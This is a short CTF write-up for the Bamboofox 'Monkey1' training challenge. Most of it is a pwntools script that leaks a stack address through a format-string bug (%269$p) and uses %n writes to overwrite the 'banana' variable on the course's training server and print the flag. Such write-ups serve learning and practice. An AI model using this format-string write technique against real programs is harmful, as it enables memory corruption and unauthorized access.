# Bamboofox/train/Monkey1 [50]

###### tags: `CTF`,`PWN`,`Bamboofox`

題目檔案連結:http://gofile.me/6lhQ2/oyjNcN1Tw

在program處存在format string漏洞,使用%p取得banana的位置後,用%n寫入

```python
# Solve script for the Monkey1 training challenge (32-bit target, see context.arch).
# Flow: leak a stack pointer through the format-string bug in menu option 2,
# derive the address of `banana` from it, overwrite `banana` with %n, then read
# the flag through menu option 3.
from pwn import *

context.arch = "i386"
# Run-mode switches: local process vs. the remote training service, pwntools
# debug logging, and attaching gdb to the local process.
local = False
debug = False
gdb1 = False

if debug == True:
    context.log_level = "debug"

if local == True:
    p = process("./monkey")
    # NOTE(review): the ELF object is loaded but never used below.
    elf1 = ELF("./monkey")
    if gdb1 == True:
        gdb.attach(p)
else:
    p = remote("bamboofox.cs.nctu.edu.tw",11000)

def program(Text):
    """Select menu option 2 and send `Text` as the line the service prints back.

    The service formats this text directly (the format-string bug the
    challenge is built around; in real code the fix is a fixed format such
    as printf("%s", text) and building with -Wformat-security).
    """
    p.recvuntil("choice!\n")
    p.sendline("2")
    p.recvuntil("out.\n")
    p.sendline(Text)

def flag():
    """Select menu option 3 and print everything up to the closing brace of the flag."""
    p.recvuntil("choice!\n")
    p.sendline("3")
    # recvuntil returns bytes, so the flag is printed as a bytes literal.
    print(p.recvuntil("}"))

# Leak: `%269$p` prints printf argument #269 as a pointer; the author found a
# stack pointer at that index (offset is specific to this binary -- re-verify
# locally before reuse).
program("%269$p")
stack = p.recvuntil("\n")
# The first 11 bytes hold "0x" + 8 hex digits of the 32-bit pointer (plus the
# trailing newline, which int() tolerates).
stack = int(stack[0:11],16)
# Per the author, `banana` sits 4 bytes above the leaked pointer -- TODO confirm
# against your copy of the binary.
banana = stack+4

# Write: the two addresses (banana and banana+2) are placed first so the
# positional `%7$n` / `%8$n` directives write to each 16-bit half; the `%Nc`
# padding sets the byte count each %n stores.
program(p32(banana)+p32(banana+2)+b"%2c%7$n%12584c%8$n")
flag()
p.interactive()
```